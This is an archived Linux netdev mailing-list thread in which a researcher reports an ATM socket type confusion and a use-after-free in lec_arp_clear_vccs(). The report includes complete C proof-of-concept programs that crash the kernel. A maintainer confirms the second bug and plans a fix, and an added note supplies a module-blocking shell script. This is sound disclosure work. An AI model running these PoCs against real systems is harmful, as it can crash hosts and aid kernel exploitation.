netdev.vger.kernel.org archive mirror
* Two bugs report
@ 2020-04-27 13:15 Gengming Liu
  2020-05-01  5:46 ` Cong Wang
  0 siblings, 1 reply; 2+ messages in thread
From: Gengming Liu @ 2020-04-27 13:15 UTC (permalink / raw)
  To: netdev

We found two security bugs in the Linux kernel, and here is the
description of the bugs.

0. Build a testing environment
  a. Set up Ubuntu 19.04 in VMware Workstation.
  b. sudo apt install linux-image-5.0.0-21-generic.
  c. Change the GRUB default boot entry to 5.0.0-21-generic (see
https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order).
Run cat /proc/version; if it is as follows, it means you succeeded.

"Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019"

  d. Compile the PoC using gcc.
  e. Execute the PoC with "sudo ./poc".
  f. Use dmesg to check the kernel message about the crash.

1. atm_vcc_userback type confusion

An ATM (AF_ATMSVC) socket's vcc->user_back can be treated as different
types of structures.

Triggering this bug requires CAP_NET_ADMIN (use sudo ./poc).

The PoC has been tested on Linux 5.0.0-21 with VMware Workstation.
/proc/version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

PoC:
#include <sys/socket.h>     /* socket(), setsockopt() */
#include <sys/ioctl.h>      /* ioctl() */
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>

int main(int argc, char const *argv[])
{
    int fd;

    /* 0x14 == AF_ATMSVC, 3 == SOCK_RAW */
    fd = socket(0x14, 3, 0);
    ioctl(fd, 0x61d8, 0x17);        // ATMMPC_CTRL

    /* ATM_SETBACKEND reads an atm_backend_t; 1 == ATM_BACKEND_PPP */
    unsigned long long arg = 1;
    ioctl(fd, 0x400261f2, &arg);    // ATM_SETBACKEND
    ioctl(fd, 0x61e2, 1);           // ATMARP_MKIP

    char buffer[] =
"\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
    setsockopt(fd, 0xe0c7, 0x80, buffer, 0x16);

    return 0;
}

2. Use-after-free in lec_arp_clear_vccs()

UAF object: struct atm_vcc *vcc

vcc is an ATM (AF_ATMSVC) socket.

To trigger this bug:

1. Create vcc sockets #A and #B.
2. ioctl(ATMLEC_CTRL) to attach #A to the LEC device.
3. ioctl(ATMLEC_DATA) to attach #B to the device's priv->lec_arp_empty_ones list.
4. Close socket #B.
5. Close vcc socket #A, which calls lec_arp_clear_vccs() and triggers the UAF.

Triggering this bug requires CAP_NET_ADMIN (use sudo ./poc).

The PoC has been tested on Linux 5.0.0-21 with VMware Workstation.
/proc/version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

PoC:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmlec.h>

#define SOCK_PORT 10000

struct my_mmsghdr
{
    struct msghdr msg_hdr;  /* Message header */
    unsigned int msg_len;   /* Number of bytes transmitted */
};

/* Send one 1-byte UDP datagram to 127.0.0.1:SOCK_PORT via sendmmsg(2),
 * carrying a 2048-byte control buffer filled with 0x2b. */
void *sendmmsg_client_func(void)
{
    int sockfd2;
    struct sockaddr_in *paddr;
    char szbuff[2050];
    int ret;

    struct sockaddr_in local_addr;
    memset(&local_addr, 0, sizeof(local_addr));
    local_addr.sin_port = htons(SOCK_PORT /*+ getpid()*/);
    local_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    local_addr.sin_family = AF_INET;

    memset(szbuff, 0x2b, 2048);

    sockfd2 = socket(AF_INET, SOCK_DGRAM, 0);
    paddr = &local_addr;

    /* Retry until the UDP socket is connected (connect() returns -1 on failure). */
    while (connect(sockfd2, (struct sockaddr *)paddr, sizeof(*paddr)) < 0)
    {
        perror("connect");
        usleep(11);
    }

    struct msghdr msg;
    struct my_mmsghdr mmsg;
    struct iovec vec;

    vec.iov_base = szbuff;
    vec.iov_len = 1;

    msg.msg_name = paddr;
    msg.msg_namelen = sizeof(*paddr);
    msg.msg_iov = &vec;
    msg.msg_iovlen = 1;
    msg.msg_control = szbuff;
    msg.msg_controllen = 2048;
    msg.msg_flags = 0;

    mmsg.msg_hdr = msg;
    mmsg.msg_len = 1;

    ret = syscall(__NR_sendmmsg, sockfd2, &mmsg, 1, 0);
    if (ret < 0)
    {
        perror("sendmmsg");
    }

    return NULL;
}

/* Steps 1-5 from the description above. */
void force_loop(void)
{
    int sockB, sockA;
    int dev = 3;
    struct atmlec_ioc ioc_data;

    /* 1. Create vcc sockets #A and #B (0x14 == AF_ATMSVC, 0x2 == SOCK_DGRAM). */
    sockB = socket(0x14, 0x2, 0x0);
    sockA = socket(0x14, 0x2, 0x0);

    /* 2. Attach #A to LEC device number `dev`. */
    ioctl(sockA, ATMLEC_CTRL, dev);

    /* 3. Attach #B to the device's lec_arp_empty_ones list. */
    ioc_data.dev_num = dev;
    ioc_data.receive = 1;
    ioctl(sockB, ATMLEC_DATA, &ioc_data);

    /* 4. Close socket #B, then send one datagram before closing #A. */
    close(sockB);
    sendmmsg_client_func();

    /* 5. Close socket #A, which calls lec_arp_clear_vccs(). */
    close(sockA);
}

int main(int argc, char const *argv[])
{
    force_loop();
    return 0;
}
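
Editor's note, not part of the original report: both PoCs reach the ATM code through AF_ATMSVC sockets and the LANE (lec), MPOA (mpoa) and CLIP (clip) ioctls, so a host that does not use ATM can keep those modules out of the kernel until a fix is installed. The script below is an added example, not the reporter's code; it lists which of these modules appear in a /proc/modules-style file and prints modprobe.d directives that refuse to load them. It assumes the module names atm, lec, mpoa and clip, and that they are built as loadable modules rather than into the kernel.

```shell
#!/bin/sh
# Added example (not from the report). Module names are assumptions:
# atm (AF_ATMSVC core), lec (LANE, lec_arp_*), mpoa (ATMMPC_CTRL),
# clip (ATMARP_MKIP). Blocking only works if they are loadable modules.
ATM_MODULES="lec mpoa clip atm"

# Print, space-separated, the names from $ATM_MODULES that are present in
# the given /proc/modules-style file. Each line of that file starts with
# the module name: "<name> <size> <refcnt> <users> <state> <addr>".
atm_modules_loaded() {
    file="$1"
    found=""
    for m in $ATM_MODULES; do
        if awk -v name="$m" '$1 == name { hit = 1 } END { exit !hit }' "$file"; then
            found="${found}${found:+ }$m"
        fi
    done
    printf '%s\n' "$found"
}

# Emit modprobe.d directives that refuse to load the ATM modules.
# "install <mod> /bin/false" also defeats alias-based autoloading
# (e.g. net-pf-20 for AF_ATMSVC), which a plain "blacklist" line does not.
atm_block_config() {
    for m in $ATM_MODULES; do
        printf 'install %s /bin/false\n' "$m"
    done
}

# Constructed sample of /proc/modules for a stand-alone run.
sample="$(mktemp)"
cat >"$sample" <<'EOF'
lec 40960 1 - Live 0x0000000000000000
atm 61440 1 lec, Live 0x0000000000000000
e1000 139264 0 - Live 0x0000000000000000
EOF
atm_modules_loaded "$sample"    # lec atm
atm_block_config                # content for /etc/modprobe.d/no-atm.conf
rm -f "$sample"
```

Run atm_modules_loaded against the real /proc/modules to see what is currently loaded; the atm_block_config output only takes effect for modules that are not already loaded.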


* Re: Two bugs report
  2020-04-27 13:15 Two bugs report Gengming Liu
@ 2020-05-01  5:46 ` Cong Wang
  0 siblings, 0 replies; 2+ messages in thread
From: Cong Wang @ 2020-05-01  5:46 UTC (permalink / raw)
  To: Gengming Liu; +Cc: Linux Kernel Network Developers

On Mon, Apr 27, 2020 at 6:16 AM Gengming Liu <l.dmxcsnsbh@gmail.com> wrote:
>
> We found two security bugs in the Linux kernel, and here is the
> description of the bugs.
>
> 0. Build a testing environment
>   a. Set up Ubuntu 19.04 in VMware Workstation.
>   b. sudo apt install linux-image-5.0.0-21-generic.
>   c. Change the GRUB default boot entry to 5.0.0-21-generic (see
> https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order).
> Run cat /proc/version; if it is as follows, it means you succeeded.
>
> "Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019"
>
>   d. Compile the PoC using gcc.
>   e. Execute the PoC with "sudo ./poc".
>   f. Use dmesg to check the kernel message about the crash.
>
> 1. atm_vcc_userback type confusion
>
> An ATM (AF_ATMSVC) socket's vcc->user_back can be treated as different
> types of structures.
>
> Triggering this bug requires CAP_NET_ADMIN (use sudo ./poc).
>
> The PoC has been tested on Linux 5.0.0-21 with VMware Workstation.
> /proc/version is:
> Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019
>
> PoC:
> #include <linux/socket.h>
> #include <linux/atmdev.h>
> #include <linux/atmarp.h>
> #include <linux/atmlec.h>
> #include <linux/atmsvc.h>
> #include <linux/atmmpc.h>
> #include <linux/atmclip.h>
>
> int main(int argc, char const *argv[])
> {
> int fd;
> fd = socket(0x14,3,0);
> ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL
>
> unsigned long long arg = 1;
> ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
> ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP
>
> char buffer[] =
> "\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
> setsockopt(fd,0xe0c7, 0x80, buffer,0x16);

What is this setsockopt() for? I don't connect it to user_back.

The ATM code checks for user_back before using, for example,

        if (cmd != ATM_SETBACKEND && atmvcc->push != pppoatm_push)
                return -ENOIOCTLCMD;



>
> return 0;
> }
>
> 2. Use-after-free in lec_arp_clear_vccs()
>
> UAF object: struct atm_vcc *vcc
>
> vcc is an ATM (AF_ATMSVC) socket.
>
> To trigger this bug:
>
> 1. Create vcc sockets #A and #B.
> 2. ioctl(ATMLEC_CTRL) to attach #A to the LEC device.
> 3. ioctl(ATMLEC_DATA) to attach #B to the device's priv->lec_arp_empty_ones list.
> 4. Close socket #B.
> 5. Close vcc socket #A, which calls lec_arp_clear_vccs() and triggers the UAF.

Yeah, good catch. I have a fix for this, will send it out shortly.

Thanks for the report!
